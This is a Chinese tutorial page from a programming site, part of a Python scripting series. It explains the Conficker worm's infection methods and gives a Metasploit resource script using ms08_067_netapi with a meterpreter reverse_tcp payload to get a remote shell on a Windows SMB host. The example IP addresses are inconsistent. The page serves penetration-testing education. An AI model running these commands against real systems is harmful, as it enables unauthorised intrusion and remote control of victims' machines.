程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

【Python腳本進階】2.4、conficker蠕蟲(上):Metasploit攻擊Windows SMB服務

編輯:Python

目錄

一、簡介

1.1、分析:

二、Metasploit攻擊Windows SMB服務

2.1、分析:

2.2、示例:


一、簡介

1.1、分析:

在其基本的感染方法中, Conficker蠕蟲使用了兩種不同的攻擊方法。

1、利用了Windows服務器中一個服務的Oday漏洞。利用這個棧溢出漏洞, 蠕蟲能在被感染的主機上執行shellcode並下載蠕蟲。

2、Conficker蠕蟲暴力破解默認的管理員網絡共享(ADMN$)的口令以獲取肉機訪問權。



二、Metasploit攻擊Windows SMB服務

2.1、分析:

利用Metasploit框架(http://metasploit.com/download/)簡化攻擊代碼。作為一個開源計算機安全項目,很快就被廣泛使用, 並且已經變成了一個漏洞利用代碼的開發工具包。


Metasploit能讓滲透測試人員在標准化和腳本化的環境中運行數以千計的不同的計算機漏洞利用代碼。在Con.ticker蠕蟲中使用的漏洞曝光後不久, HDMoore就將一個有效的漏洞利用代碼整合進了框架內—-MS08-067 _netapi

2.2、示例:

雖然攻擊者可以通過交互驅動的方式使用Metasploit, 但Metasploit也能讀取批處理腳本(re)完成攻擊。在攻擊時,Metasploit會順序執行批處理文件中的命令。


如使用ms08 _ 067 netapi (Conficker)攻擊“ 肉機” (192.168.x.x), 使之與我們自己的主機192.168.xx.xx的7777端口建立一個反向shell

use exploit/windows/smb/ms08_ 067_netapi
set RHOST 192.168.x.x
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.xx.xx
set LPORT 7777
exploit -j -z

使用Metasploit進行攻擊時, 先選好要用的漏洞利用代碼(exploit/windows/smb/ms08 _ 067 _ netapi)

選定目標,目標設置為192.168.1.37

設定負載為windows/meterpreter/reverse _ tcp

將反向連接的目標設為主機192.168.77.77, 端口為7777

最後Metasploit去實施攻擊。


將上面這些代碼保存為文件conficker.rc。只要輸入命令msfconsole -r conficker.rc, 就能發起攻擊。這條命令讓Metasploit運行腳本conficker.rc中的指令。如果攻擊成功, 會返回一個讓我們能控制目標計算機的Windows 命令行shell。


  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved